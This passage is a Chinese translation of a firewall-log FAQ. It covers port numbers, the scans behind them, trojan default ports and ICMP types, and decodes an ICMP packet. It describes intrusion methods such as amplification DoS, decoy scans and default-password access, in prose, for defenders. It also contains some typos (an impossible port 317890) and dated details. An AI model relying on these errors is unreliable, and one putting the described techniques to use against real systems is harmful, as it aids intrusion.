  2) 注册端口(Registered Ports):从1024到49151。它们松散地绑定于一些服务。也就是说有许多服务绑定于这些端口,这些端口同样用于许多其它目的。例如:许多系统处理动态端口从1024左右开始。

  3) 动态和/或私有端口(Dynamic and/or Private Ports):从49152到65535。理论上,不应为服务分配这些端口。实际上,机器通常从1024起分配动态端口。但也有例外:SUN的RPC端口从32768开始。

  从哪里获得更全面的端口信息:

  1.ftp://ftp.isi.edu/in-notes/iana/assignments/port-numbers

  "Assigned Numbers" RFC,端口分配的官方来源。

  2.http://advice.networkice.com/advice/Exploits/Ports/

  端口数据库,包含许多系统弱点的端口。

  3./etc/services

  UNIX 系统中文件/etc/services包含通常使用的UNIX端口分配列表。Windows NT中该文件位于%systemroot%/system32/drivers/etc/services。

  4.http://www.con.wesleyan.edu/~triemer/network/docservs.html

  特定的协议与端口。

  5.http://www.chebucto.ns.ca/~rakerman/trojan-port-table.html

  描述了许多端口。

  6.http://www.tlsecurity.com/trojanh.htm

  TLSecurity的Trojan端口列表。与其它人的收藏不同,作者检验了其中的所有端口。

  7.http://www.simovits.com/nyheter9902.html

  Trojan Horse 探测

  二、通常对于防火墙的TCP/UDP端口扫描有哪些?

  本节讲述通常TCP/UDP端口扫描在防火墙记录中的信息。记住:并不存在所谓ICMP端口。如果你对解读ICMP数据感兴趣,请参看本文的其它部分。

  0 通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用一种通常的闭合端口连接它时将产生不同的结果。一种典型的扫描:使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。

  1 tcpmux 这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者,缺省情况下tcpmux在这种系统中被打开。Iris机器在发布时含有几个缺省的无密码的帐户,如lp, guest, uucp, nuucp, demos, tutor, diag, EZsetup, OutOfBox, 和4Dgifts。许多管理员安装后忘记删除这些帐户。因此Hacker们在Internet上搜索tcpmux并利用这些帐户。

  7 Echo 你能看到许多人们搜索Fraggle放大器时,发送到x.x.x.0和x.x.x.255的信息。

  常见的一种DoS攻击是echo循环(echo-loop),攻击者伪造从一个机器发送到另一个机器的UDP数据包,而两个机器分别以它们最快的方式回应这些数据包。(参见Chargen)

  另一种东西是由DoubleClick在词端口建立的TCP连接。有一种产品叫做“Resonate Global Dispatch”,它与DNS的这一端口连接以确定最近的路由。

  Harvest/squid cache将从3130端口发送UDP echo:“如果将cache的source_ping on选项打开,它将对原始主机的UDP echo端口回应一个HIT reply。”这将会产生许多这类数据包。

  11 sysstat 这是一种UNIX服务,它会列出机器上所有正在运行的进程以及是什么启动了这些进程。这为入侵者提供了许多信息而威胁机器的安全,如暴露已知某些弱点或帐户的程序。这与UNIX系统中“ps”命令的结果相似

  再说一遍:ICMP没有端口,ICMP port 11通常是ICMP type=11

  19 chargen 这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有LJ字符的包。TCP连接时,会发送含有LJ字符的数据流知道连接关闭。Hacker利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。由于服务器企图回应两个服务器之间的无限的往返数据通讯一个chargen和echo将导致服务器过载。同样fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包,受害者为了回应这些数据而过载。

  21 ftp 最常见的攻击者用于寻找打开“anonymous”的ftp服务器的方法。这些服务器带有可读写的目录。Hackers或Crackers 利用这些服务器作为传送warez (私有程序) 和pr0n(故意拼错词而避免被搜索引擎分类)的节点。

  22 ssh PcAnywhere建立TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点。如果配置成特定的模式,许多使用RSAREF库的版本有不少漏洞。(建议在其它端口运行ssh)

 

  还应该注意的是ssh工具包带有一个称为make-ssh-known-hosts的程序。它会扫描整个域的ssh主机。你有时会被使用这一程序的人无意中扫描到。

  UDP(而不是TCP)与另一端的5632端口相连意味着存在搜索pcAnywhere的扫描。5632(十六进制的0x1600)位交换后是0x0016(使进制的22)。

  23 Telnet 入侵者在搜索远程登陆UNIX的服务。大多数情况下入侵者扫描这一端口是为了找到机器运行的操作系统。此外使用其它技术,入侵者会找到密码。

  25 smtp 攻击者(spammer)寻找SMTP服务器是为了传递他们的spam。入侵者的帐户总被关闭,他们需要拨号连接到高带宽的e-mail服务器上,将简单的信息传递到不同的地址。SMTP服务器(尤其是sendmail)是进入系统的最常用方法之一,因为它们必须完整的暴露于Internet且邮件的路由是复杂的(暴露+复杂=弱点)。

  53 DNS Hacker或crackers可能是试图进行区域传递(TCP),欺骗DNS(UDP)或隐藏其它通讯。因此防火墙常常过滤或记录53端口。

  需要注意的是你常会看到53端口做为UDP源端口。不稳定的防火墙通常允许这种通讯并假设这是对DNS查询的回复。Hacker常使用这种方法穿透防火墙。

  67和68 Bootp和DHCP UDP上的Bootp/DHCP:通过DSL和cable-modem的防火墙常会看见大量发送到广播地址255.255.255.255的数据。这些机器在向DHCP服务器请求一个地址分配。Hacker常进入它们分配一个地址把自己作为局部路由器而发起大量的“中间人”(man-in-middle)攻击。客户端向68端口(bootps)广播请求配置,服务器向67端口(bootpc)广播回应请求。这种回应使用广播是因为客户端还不知道可以发送的IP地址。

  69 TFTP(UDP) 许多服务器与bootp一起提供这项服务,便于从系统下载启动代码。但是它们常常错误配置而从系统提供任何文件,如密码文件。它们也可用于向系统写入文件。

  79 finger Hacker用于获得用户信息,查询操作系统,探测已知的缓冲区溢出错误,回应从自己机器到其它机器finger扫描。

  98 linuxconf 这个程序提供linux boxen的简单管理。通过整合的HTTP服务器在98端口提供基于Web界面的服务。它已发现有许多安全问题。一些版本setuid root,信任局域网,在/tmp下建立Internet可访问的文件,LANG环境变量有缓冲区溢出。此外因为它包含整合的服务器,许多典型的HTTP漏洞可能存在(缓冲区溢出,历遍目录等)

  109 POP2 并不象POP3那样有名,但许多服务器同时提供两种服务(向后兼容)。在同一个服务器上POP3的漏洞在POP2中同样存在。

  110 POP3 用于客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用户名和密码交换缓冲区溢出的弱点至少有20个(这意味着Hacker可以在真正登陆前进入系统)。成功登陆后还有其它缓冲区溢出错误。

  111 sunrpc portmap rpcbind Sun RPC PortMapper/RPCBIND。访问portmapper是扫描系统查看允许哪些RPC服务的最早的一步。常见RPC服务有:rpc.mountd, NFS, rpc.statd, rpc.csmd, rpc.ttybd, amd等。入侵者发现了允许的RPC服务将转向提供服务的特定端口测试漏洞。

  记住一定要记录线路中的daemon, IDS, 或sniffer,你可以发现入侵者正使用什么程序访问以便发现到底发生了什么。

  113 Ident auth 这是一个许多机器上运行的协议,用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多机器的信息(会被Hacker利用)。但是它可作为许多服务的记录器,尤其是FTP, POP, IMAP, SMTP和IRC等服务。通常如果有许多客户通过防火墙访问这些服务,你将会看到许多这个端口的连接请求。记住,如果你阻断这个端口客户端会感觉到在防火墙另一边与e-mail服务器的缓慢连接。许多防火墙支持在TCP连接的阻断过程中发回RST,着将回停止这一缓慢的连接。

  119 NNTP news 新闻组传输协议,承载USENET通讯。当你链接到诸如:news://comp.security.firewalls/. 的地址时通常使用这个端口。这个端口的连接企图通常是人们在寻找USENET服务器。多数ISP限制只有他们的客户才能访问他们的新闻组服务器。打开新闻组服务器将允许发/读任何人的帖子,访问被限制的新闻组服务器,匿名发帖或发送spam。

  135 oc-serv MS RPC end-point mapper Microsoft在这个端口运行DCE RPC end-point mapper为它的DCOM服务。这与UNIX 111端口的功能很相似。使用DCOM和/或RPC的服务利用机器上的end-point mapper注册它们的位置。远端客户连接到机器时,它们查询end-point mapper找到服务的位置。同样Hacker扫描机器的这个端口是为了找到诸如:这个机器上运行Exchange Server吗?是什么版本?

  这个端口除了被用来查询服务(如使用epdump)还可以被用于直接攻击。有一些DoS攻击直接针对这个端口。

  137 NetBIOS name service nbtstat (UDP) 这是防火墙管理员最常见的信息,请仔细阅读文章后面的NetBIOS一节

  139 NetBIOS File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于Windows“文件和打印机共享”和SAMBA。在Internet上共享自己的硬盘是可能是最常见的问题。

  大量针对这一端口始于1999,后来逐渐变少。2000年又有回升。一些VBS(IE5 VisualBasic Scripting)开始将它们自己拷贝到这个端口,试图在这个端口繁殖。

  143 IMAP 和上面POP3的安全问题一样,许多IMAP服务器有缓冲区溢出漏洞运行登陆过程中进入。记住:一种Linux蠕虫(admw0rm)会通过这个端口繁殖,因此许多这个端口的扫描来自不知情的已被感染的用户。当RadHat在他们的Linux发布版本中默认允许IMAP后,这些漏洞变得流行起来。Morris蠕虫以后这还是第一次广泛传播的蠕虫。

  这一端口还被用于IMAP2,但并不流行。

  已有一些报道发现有些0到143端口的攻击源于脚本。

  161 SNMP(UDP) 入侵者常探测的端口。SNMP允许远程管理设备。所有配置和运行信息都储存在数据库中,通过SNMP客获得这些信息。许多管理员错误配置将它们暴露于Internet。Crackers将试图使用缺省的密码“public”“private”访问系统。他们可能会试验所有可能的组合。

  SNMP包可能会被错误的指向你的网络。Windows机器常会因为错误配置将HP JetDirect remote management软件使用SNMP。HP OBJECT IDENTIFIER将收到SNMP包。新版的Win98使用SNMP解析域名,你会看见这种包在子网内广播(cable modem, DSL)查询sysName和其它信息。

  162 SNMP trap 可能是由于错误配置

  177 xdmcp 许多Hacker通过它访问X-Windows控制台, 它同时需要打开6000端口。

  513 rwho 可能是从使用cable modem或DSL登陆到的子网中的UNIX机器发出的广播。这些人为Hacker进入他们的系统提供了很有趣的信息。

  553 CORBA IIOP (UDP) 如果你使用cable modem或DSL VLAN,你将会看到这个端口的广播。CORBA是一种面向对象的RPC(remote procedure call)系统。Hacker会利用这些信息进入系统。

  600 Pcserver backdoor 请查看1524端口

  一些玩script的孩子认为他们通过修改ingreslock和pcserver文件已经完全攻破了系统-- Alan J. Rosenthal.

  635 mountd Linux的mountd Bug。这是人们扫描的一个流行的Bug。大多数对这个端口的扫描是基于UDP的,但基于TCP的mountd有所增加(mountd同时运行于两个端口)。记住,mountd可运行于任何端口(到底在哪个端口,需要在端口111做portmap查询),只是Linux默认为635端口,就象NFS通常运行于2049端口。

  1024 许多人问这个端口是干什么的。它是动态端口的开始。许多程序并不在乎用哪个端口连接网络,它们请求操作系统为它们分配“下一个闲置端口”。基于这一点分配从端口1024开始。这意味着第一个向系统请求分配动态端口的程序将被分配端口1024。为了验证这一点,你可以重启机器,打开Telnet,再打开一个窗口运行“natstat -a”,你将会看到Telnet被分配1024端口。请求的程序越多,动态端口也越多。操作系统分配的端口将逐渐变大。再来一遍,当你浏览Web页时用“netstat”查看,每个Web页需要一个新端口。

  1025 参见1024

  1026 参见1024

  1080 SOCKS

  这一协议以管道方式穿过防火墙,允许防火墙后面的许多人通过一个IP地址访问Internet。理论上它应该只允许内部的通信向外达到Internet。但是由于错误的配置,它会允许Hacker/Cracker的位于防火墙外部的攻击穿过防火墙。或者简单地回应位于Internet上的计算机,从而掩饰他们对你的直接攻击。WinGate是一种常见的Windows个人防火墙,常会发生上述的错误配置。在加入IRC聊天室时常会看到这种情况。

  1114 SQL

  系统本身很少扫描这个端口,但常常是sscan脚本的一部分。

  1243 Sub-7木马(TCP)

  参见Subseven部分。

  1524 ingreslock后门

  许多攻击脚本将安装一个后门Shell于这个端口(尤其是那些针对Sun系统中Sendmail和RPC服务漏洞的脚本,如statd, ttdbserver和cmsd)。如果你刚刚安装了你的防火墙就看到在这个端口上的连接企图,很可能是上述原因。你可以试试Telnet到你的机器上的这个端口,看看它是否会给你一个Shell。连接到600/pcserver也存在这个问题。

  2049 NFS

  NFS程序常运行于这个端口。通常需要访问portmapper查询这个服务运行于哪个端口,但是大部分情况是安装后NFS运行于这个端口,Hacker/Cracker因而可以闭开portmapper直接测试这个端口。

  3128 squid

  这是Squid HTTP代理服务器的默认端口。攻击者扫描这个端口是为了搜寻一个代理服务器而匿名访问Internet。你也会看到搜索其它代理服务器的端口:8000/8001/8080/8888。扫描这一端口的另一原因是:用户正在进入聊天室。其它用户(或服务器本身)也会检验这个端口以确定用户的机器是否支持代理。请查看5.3节。

  5632 pcAnywere

  你会看到很多这个端口的扫描,这依赖于你所在的位置。当用户打开pcAnywere时,它会自动扫描局域网C类网以寻找可能得代理(译者:指agent而不是proxy)。Hacker/cracker也会寻找开放这种服务的机器,所以应该查看这种扫描的源地址。一些搜寻pcAnywere的扫描常包含端口22的UDP数据包。参见拨号扫描。

  6776 Sub-7 artifact

  这个端口是从Sub-7主端口分离出来的用于传送数据的端口。例如当控制者通过电话线控制另一台机器,而被控机器挂断时你将会看到这种情况。因此当另一人以此IP拨入时,他们将会看到持续的,在这个端口的连接企图。(译者:即看到防火墙报告这一端口的连接企图时,并不表示你已被Sub-7控制。)

  6970 RealAudio

  RealAudio客户将从服务器的6970-7170的UDP端口接收音频数据流。这是由TCP7070端口外向控制连接设置的。

  13223 PowWow

  PowWow 是Tribal Voice的聊天程序。它允许用户在此端口打开私人聊天的连接。这一程序对于建立连接非常具有“进攻性”。它会“驻扎”在这一TCP端口等待回应。这造成类似心跳间隔的连接企图。如果你是一个拨号用户,从另一个聊天者手中“继承”了IP地址这种情况就会发生:好象很多不同的人在测试这一端口。这一协议使用“OPNG”作为其连接企图的前四个字节。

  17027 Conducent

  这是一个外向连接。这是由于公司内部有人安装了带有Conducent "adbot" 的共享软件。Conducent "adbot"是为共享软件显示广告服务的。使用这种服务的一种流行的软件是Pkware。有人试验:阻断这一外向连接不会有任何问题,但是封掉IP地址本身将会导致adbots持续在每秒内试图连接多次而导致连接过载:

机器会不断试图解析DNS名—ads.conducent.com,即IP地址216.33.210.40 ;216.33.199.77 ;216.33.199.80 ;216.33.199.81;216.33.210.41。(译者:不知NetAnts使用的Radiate是否也有这种现象)

  27374 Sub-7木马(TCP)

  参见Subseven部分。

  30100 NetSphere木马(TCP)

  通常这一端口的扫描是为了寻找中了NetSphere木马。

  31337 Back Orifice “elite”

  Hacker中31337读做“elite”/ei’li:t/(译者:法语,译为中坚力量,精华。即3=E, 1=L, 7=T)。因此许多后门程序运行于这一端口。其中最有名的是Back Orifice。曾经一段时间内这是Internet上最常见的扫描。现在它的流行越来越少,其它的木马程序越来越流行。

  31789 Hack-a-tack

  这一端口的UDP通讯通常是由于"Hack-a-tack"远程访问木马(RAT, Remote Access Trojan)。这种木马包含内置的31790端口扫描器,因此任何31789端口到317890端口的连接意味着已经有这种入侵。(31789端口是控制连接,317890端口是文件传输连接)

  32770~32900 RPC服务

  Sun Solaris的RPC服务在这一范围内。详细的说:早期版本的Solaris(2.5.1之前)将portmapper置于这一范围内,即使低端口被防火墙封闭仍然允许Hacker/cracker访问这一端口。扫描这一范围内的端口不是为了寻找portmapper,就是为了寻找可被攻击的已知的RPC服务。

  33434~33600 traceroute

  如果你看到这一端口范围内的UDP数据包(且只在此范围之内)则可能是由于traceroute。参见traceroute部分。

  41508 Inoculan

  早期版本的Inoculan会在子网内产生大量的UDP通讯用于识别彼此。参见

  http://www.circlemud.org/~jelson/software/udpsend.html

  http://www.ccd.bnl.gov/nss/tips/inoculan/index.html

  下面的这些源端口意味着什么?

  端口1~1024是保留端口,所以它们几乎不会是源端口。但有一些例外,例如来自NAT机器的连接。参见1.9。

  常看见紧接着1024的端口,它们是系统分配给那些并不在乎使用哪个端口连接的应用程序的“动态端口”。

  Server Client 服务 描述

  1-5/tcp 动态 FTP 1-5端口意味着sscan脚本

  20/tcp 动态 FTP FTP服务器传送文件的端口

  53 动态 FTP DNS从这个端口发送UDP回应。你也可能看见源/目标端口的TCP连接。

  123 动态 S/NTP 简单网络时间协议(S/NTP)服务器运行的端口。它们也会发送到这个端口的广播。

  27910~27961/udp 动态 Quake Quake或Quake引擎驱动的游戏在这一端口运行其服务器。因此来自这一端

  口范围的UDP包或发送至这一端口范围的UDP包通常是游戏。

  61000以上 动态 FTP 61000以上的端口可能来自Linux NAT服务器(IP Masquerade)

三、我发现一种对于同一系列端口的扫描来自于Internet上变化很大的源地址这通常是由于“诱骗”扫描(decoy scan),如nmap。其中一个是攻击者,其它的则不是。

  利用防火墙规则和协议分析我们可以追踪他们是谁?例如:如果你ping每个系统,你就可以将获得的TTL与那些连接企图相匹配。这样你至少可以哪一个是“诱骗”扫描(TTL应该匹配,如果不匹配则他们是被“诱骗”了)。不过,新版本的扫描器会将攻击者自身的TTL随机化,这样要找出他们回更困难。

  你可以进一步研究你的防火墙记录,寻找在同一子网中被诱骗的地址(人)。你通常会发现攻击者刚刚试图对你连接,而被诱骗者不会。

四、特洛伊木马扫描是指什么?

  特洛伊木马攻击的第一步是将木马程序放置到用户的机器上。常见的伎俩有:

  1) 将木马程序发布在Newsgroup中,声称这是另一种程序。

  2) 广泛散布带有附件的E-mail

  3) 在其Web上发布木马程序

  4) 通过即时通讯软件或聊天系统发布木马程序(ICQ, AIM, IRC等)

  5) 伪造ISP(如AOL)的E-mail哄骗用户执行程序(如软件升级)

  6) 通过“文件与打印共享”将程序Copy至启动组

  下一步将寻找可被控制的机器。最大的问题是上述方法无法告知Hacker/Cracker受害者的机器在哪里。因此,Hacker/Cracker扫描Internet。

  这就导致防火墙用户(包括个人防火墙用户)经常看到指向他们机器的扫描。他们的机器并没有被攻击,扫描本身不会造成什么危害。扫描本身不会造成机器被攻击。真正的管理员会忽略这种“攻击”

  以下列出常见的这种扫描。为了发现你的机器是否被种了木马,运行“NETSTAT -an”。查看是否出现下列端口的连接。

  Port Trojan

  555 phAse zero

  1243 Sub-7, SubSeven

  3129 Masters Paradise

  6670 DeepThroat

  6711 Sub-7, SubSeven

  6969 GateCrasher

  21544 GirlFriend

  12345 NetBus

  23456 EvilFtp  

  27374 Sub-7, Seven

  30100 NetSphere

  31789 Hack‘a‘Tack

  31337 BackOrifice, and many others

  50505 Sockets de Troie

  更多信息查看:http://www.commodon.com/threat/threat-ports.htm

  什么是SUBSEVEN(sub-7)

  Sub-7是最有名的远程控制木马之一。现在它已经成为易于使用,功能强大的一种木马。原因是:

  1〕它易于获得,升级迅速。大部分木马产生后除了修改bug以外开发就停止了。

  2〕这一程序不但包含一个扫描器,还能利用被控制的机器也进行扫描。

  3〕制作者曾比赛利用sub-7控制网站。

  4〕支持“端口重定向”,因此任何攻击者都可以利用它控制受害者的机器。

  5〕具有大量与ICQ, AOL IM, MSN Messager和Yahoo messenger相关的功能,包括密码嗅探,发送消息等。

  6〕 具有大量与UI相关的功能,如颠倒屏幕,用受害者扩音器发声,偷窥受害者屏幕。

  简而言之它不仅是一种hacking工具而且是一种玩具,恐吓受害者的玩具。

  Sub-7是由自称“Mobman”的人写的,他的站点是http://subseven.slak.org/。

  Sub-7可能使用以下端口:

  1243 老版本缺省连接端口

  2772 抓屏端口

  2773 键盘记录端口

  6711 ???

  6776 我并不清楚这个端口是干什么用的,但是它被作为一些版本的后面 (即不用密码也能连接)。

  7215 "matrix" chat程序

  27374 v2.0缺省端口

  54283 Spy端口

  五、来自低端口的DNS包

  Q:我看见许多来自1024端口以下的DNS请求。这些服务是“保留”的吗?他们不是应该使用1024-65535端口吗?

  A:他们来自于NAT防火墙后面的机器。NAT并不需要保留端口。(Ryan Russell >http://www.sybase.com/)

  Q:我的防火墙丢弃了许多源端口低于1024的包,所以DNS查询失败。

  A:不要用这种方式过滤。许多防火墙有类似的规则,但这是一种误导。因为Hacker/Cracker能伪造任何端口。

  Q:这些NAT防火墙工作不正常吗?

  A:理论上不是,但实际上会导致失败。正确的方式是在任何情况下完全保证DNS通讯。(尤其在那些“代理”DNS并强迫DNS通过53端口的情况下)

  Q:我以为DNS查询应该使用1024端口以上的随机端口?

  A:实际上,一般DNS客户将使用非保留端口。但是有许多程序使用53端口。在任何情况下,NAT都会完全不同,因为它改变了所有SOCKET(IP+port combo)

  六、一旦我拨号连接到ISP后,我的个人防火墙就开始警告“有人在探测你的xxxx端口”。

  这种情况很常见。因为你使用ISP分配给你的IP,而在你使用之前刚有人使用。你看到的是上一个用户的“残留”信息。

  常见的例子是聊天程序。如果有人刚刚挂断,刚才和他聊天的人会继续试图连接。一些程序的“超时”设置很长。如POWWOW或ICQ。

  另一个例子是多人在线游戏。你会看到来自游戏提供者的通讯(如MPlayer),或其它不知名的游戏服务器。这些游戏通常基于UDP,因此无法建立连接。但为了获得较好的用户感觉,他们对于建立连接又很“执着”。以下是一些游戏的端口:

  7777 Unreal, Klingon Honor Guard

  7778 Unreal Tournament

  22450 Sin

  26000 Quake

  26900 Hexen 2

  26950 HexenWorld

  27015 Half-life, Team Fortress Classic (TFC)

  27500 QuakeWorld

  27910 Quake 2

  28000-28008 Starsiege TRIBES (TRIBES.DYNAMIX.COM)

  28910 Heretic 2

  另一个例子是多媒体广播、电视。如RealAudio客户端使用6970-7170端口接收声音数据。

  你需要连接的来源。例如ICQ服务器运行于4000端口,而其客户端使用更高的随机端口。这就是说你会看到你会看到从4000端口到高端随机端口的UDP包。换句话说,不要试图查询端口列表找到随机高端端口的用途。重要的是源端口。

  Sub-7也有类似问题。它使用不同的TCP连接用于不同的服务。如果受害者的机器下线,它会持续企图连接受害者机器的端口,特别是6776端口。

  七、IRC服务器在探测我

  最流行的聊天方式之一是IRC。这种聊天程序的特点之一就是它能告诉你正在和你聊天的人的IP地址。聊天室的问题之一是:人们匿名登陆并四处闲逛,往往会遭遇跑题的评论、粗鲁的话语、被打断谈话、被服务器“冲洗”或被其它客户踢下线。

  因此,服务器端和客户端都默认禁止在聊天室内使用匿名登陆。特别需要指出的是,当有人进入聊天室时要检查他们是否通过其它代理服务器连接。最常见的这种扫描是SOCKS。假设你来的那个地方支持SOCKS,那么你完全有可能有一台完全独立的机器,你试图通过明处的代理服务器隐藏你在暗处的真实身份。Undernet’s关于这方面的策略可参考http://help.undernet.org/proxyscan.

  同时,crackers/hackers会试图扫描人们的机器以确定他们是否运行某种服务,可被他们用做跳板。同样,通过检查SOCKS,攻击者希望发现某人打开了SOCKS,例如一个家庭的个人用户SOCKS实现共享连接,但将其错误设置成Internet上所有用户都能通过它。

  八、什么是“重定向”端口

 一种常见的技术是把一个端口重定向到另一个地址。例如默认的HTTP端口是80,许多人把他们重定向到令一个端口,如8080( 这样,如果你打算访问本文就得写成http://www.robertgraham.com:8080/pubs/firewall-seen.html )

  实现重定向是为了让端口更难被发现,从而使Hacker更难攻击。因为Hacker不能对一个公认的默认端口进行攻击而必须进行端口扫描。

  大多数端口重定向与原端口有相似之处。因此,大多数HTTP端口由80变化而来:81,88,8000,8080,8888。同样POP的端口原来在110,也常被重定向到1100。

  也有不少情况是选取统计上有特别意义的数,象1234,23456,34567等。许多人有其它原因选择奇怪的数,42,69,666,31337。近来,越来越多的远程控制木马( Remote Access Trojans, RATs )采用相同的默认端口。如NetBus的默认端口是12345。

  Blake R. Swopes指出使用重定向端口还有一个原因,在UNIX系统上,如果你想侦听1024以下的端口需要有root权限。如果你没有root权限而又想开web服务,你就需要将其安装在较高的端口。此外,一些ISP的防火墙将阻挡低端口的通讯,所以即使你拥有整个机器你还是得重定向端口。

  九、我还是不明白当某人试图连接我的某个端口时我该怎么办?

  你可以使用Netcat建立一个侦听进程。例如,你想侦听1234端口:

  NETCAT -L -p 1234

  许多协议都会在连接开始的部分发送数据。当使用Netcat侦听某个端口时,你能想办法搞清在使用什么协议。如果幸运的话,你会发现是HTTP协议,它会为你提供大量信息,使你能追踪发生的事情。

  “-L”参数是让Netcat持续侦听。正常情况下Netcat会接受一个连接,复制其内容,并退出。加上这个参数后,它可以持续运行以侦听多个连接。

ICMP

  TCP和UDP能承载数据,但ICMP仅包含控制信息。因此,ICMP信息不能真正用于入侵其它机器。Hacker们使用ICMP通常是为了扫描网络,发动DoS攻击,重定向网络交通。(这个观点似乎不正确,可参考shotgun关于木马的文章,译者注)

  一些防火墙将ICMP类型错误标记成端口。要记住,ICMP不象TCP或UDP有端口,但它确实含有两个域:类型(type)和代码(code)。而且这些域的作用和端口也完全不同,也许正因为有两个域所以防火墙常错误地标记了他们。更多关于ICMP的知识请参考Infosec Lexicon entry on ICMP。

  关于ICMP类型/代码的含义的官方说明请参阅http://www.isi.edu/in-notes/iana/assignments/icmp-parameters。该文献描述官方含义,而本文描述Hacker的企图,详见下文。

  类型 代码 名称 含义

  0 * Echo replay 对ping的回应

  3 * Destination Unreachable 主机或路由器返回信息:一些包未达到目的地

  0 Net Unreachable 路由器配置错误或错误指定IP地址

  1 Host Unreachable 最后一个路由器无法与主机进行ARP通讯

  3 Port unreachable 服务器告诉客户端其试图联系的端口无进程侦听

  4 Fragmentation Needed but DF set 重要:如果你在防火墙丢弃记录中发现这些包,你应该让他们通过否则你的客户端将发现TCP连接莫名其妙地断开

  4 * Source Quench Internet阻塞

  5 * Redirect 有人试图重定向你的默认路由器,可能Hacker试图对你进行“man-in-middle”的攻击,使你的机器通过他们的机器路由。

  8 * Echo Request ping

  9 * Router Advertisement hacker可能通过重定向你的默认的路由器DoS攻击你的Win9x 或Solaris。邻近的Hacker也可以发动man-in-the-middle的攻击

  10 * Time Exceeded In Transit 因为超时包未达到目的地

  0 TTL Exceeded 因为路由循环或由于运行traceroute,路由器将包丢弃

  1 Fragment reassembly timeout 由于没有收到所有片断,主机将包丢弃

  11 * Parameter Problem 发生某种不正常,可能遇到了攻击

  (一) type=0 (Echo reply)

  发送者在回应由你的地址发送的ping,可能是由于以下原因:

  有人在ping那个人:防火墙后面有人在ping目标。

  自动ping:许多程序为了不同目的使用ping,如测试联系对象是否在线,或测定反应时间。很可能是使用了类似VitalSign‘s Net.Medic的软件,它会发送不同大小的ping包以确定连接速度。

  诱骗ping扫描:有人在利用你的IP地址进行ping扫描,所以你看到回应。

  转变通讯信道:很多网络阻挡进入的ping(type=8),但是允许ping回应(type=0)。因此,Hacker已经开始利用ping回应穿透防火墙。例如,针对internet站点的DdoS攻击,其命令可能被嵌入ping回应中,然后洪水般的回应将发向这些站点而其它Internet连接将被忽略。

  (二) Type=3 (Destination Unreachable)

  在无法到达的包中含有的代码(code)很重要记住这可以用于击败“SYN洪水攻击”。即如果正在和你通讯的主机受到“SYN洪水攻击”,只要你禁止ping(type=3)进入,你就无法连接该主机。

  有些情况下,你会收到来自你从未听说的主机的ping(type=3)包,这通常意味着“诱骗扫描”。攻击者使用很多源地址向目标发送一个伪造的包,其中有一个是真正的地址。Hacker的理论是:受害者不会费力从许多假地址中搜寻真正的地址。

  解决这个问题的最好办法是:检查你看到的模式是否与“诱骗扫描”一致。比如,在ICMP包中的TCP或UDP头部分寻找交互的端口。

  1) Type = 3, Code = 0 (Destination Net Unreachable)

  无路由器或主机:即一个路由器对主机或客户说,:“我根本不知道在网络中如何路由!包括你正连接的主机”。这意味着不是客户选错了IP地址就是某处的路由表配置错误。记住,当你把自己UNIX机器上的路由表搞乱后你就会看到“无路由器或主机”的信息。这常发生在配置点对点连接的时候。

  2) Type = 3, Code = 3 (Destination Port Unreachable)

  这是当客户端试图连击一个并不存在的UDP端口时服务器发送的包。例如,如果你向161端口发送SNMP包,但机器并不支持SNMP服务,你就会收到ICMP Destination Port Unreachable包。

  解码的方案

  解决这个问题的第一件事是:检查包中的端口。你可能需要一个嗅探器,因为防火墙通常不会记录这种信息。这种方法基于ICMP原始包头包含IP和UDP头。以下是复制的一个ICMP unreachable包:

  00 00 BA 5E BA 11 00 60 97 07 C0 FF 08 00 45 00

  00 38 6F DF 00 00 80 01 B4 12 0A 00 01 0B 0A 00

  01 C9 03 03 C2 D2 00 00 00 00 45 00 00 47 07 F0

  00 00 80 11 1B E3 0A 00 01 C9 0A 00 01 0B 08 A7

  79 19 00 33 B8 36

  其中字节03 03是ICMP的类型和代码。最后8个字节是原始UDP头,解码如下:

  08A7 UDP源端口 port=2215,可能是临时分配的,并不是很重要。

  7919 UDP目标端口 port=31001,很重要,可能原来用户想连接31001端口的服务。

  0033 UDP长度 length=51,这是原始UDP数据的长度,可能很重要。

  B836 UDP校验和 checksum=0xB836,可能不重要。

  你为什么会看到这些?

  “诱骗UDP扫描”:有人在扫描向你发送ICMP的机器。他们伪造源地址,其中之一是你的IP地址。他们实际上伪造了许多不同的源地址使受害者无法确定谁是攻击者。如果你在短时间内收到大量来自同一地址的这种包,很有可能是上述情况。检查UDP源端口,它总在变化的话,很可能是Scenario。

  “陈旧DNS”:客户端会向服务器发送DNS请求,这将花很长时间解析。当你的DNS服务器回应的时候,客户端可能已经忘记你并关闭了用于接受你回应的UDP端口。如果发现UDP端口值是53,大概就发生了这种情况。这是怎么发生的?服务器可能在解析一个递归请求,但是它自己的包丢失了,所以它只能超时然后再试。当回到客户时,客户认为超时了。许多客户程序(尤其是Windows中的程序)自己做DNS解析。即它们自己建立SOCKET进行DNS解析。如果它们把要求交给操作系统,操作系统就会一直把端口开在那里。

  “多重DNS回应”:另一种情况是客户收到对于一个请求的多重回应。收到一个回应,端口就关闭了,后序的回应无法达到。此外,一个Sun机器与同一个以太网中的多个NICs连接时,将为两个NICs分配相同的MAC地址,这样Sun机器每桢会收到两个拷贝,并发送多重回复。还有,一个编写的很糟糕的客户端程序(特别是那些吹嘘是多线程DNS解析但实际上线程不安全的程序)有时发送多重请求,收到第一个回应后关闭了Socket。但是,这也可能是DNS欺骗,攻击者既发送请求由发送回应,企图使解析缓存崩溃。

  “NetBIOS解析”:如果Windows机器接收到ICMP包,看看UDP目标端口是否是137。如果是,那就是windows机器企图执行gethostbyaddr()函数,它将将会同时使用DNS和NetBIOS解析IP地址。DNS请求被发送到某处的DNS服务器,但NetBIOS直接发往目标机器。如果目标机器不支持NetBIOS,目标机器将发送ICMP unreachable。

